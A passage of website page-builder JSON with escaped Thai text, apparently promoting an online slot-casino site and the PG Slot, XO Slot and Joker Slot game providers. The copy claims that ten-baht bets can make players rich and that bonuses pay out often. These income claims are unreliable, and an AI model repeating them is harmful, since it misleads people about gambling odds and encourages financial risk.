\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 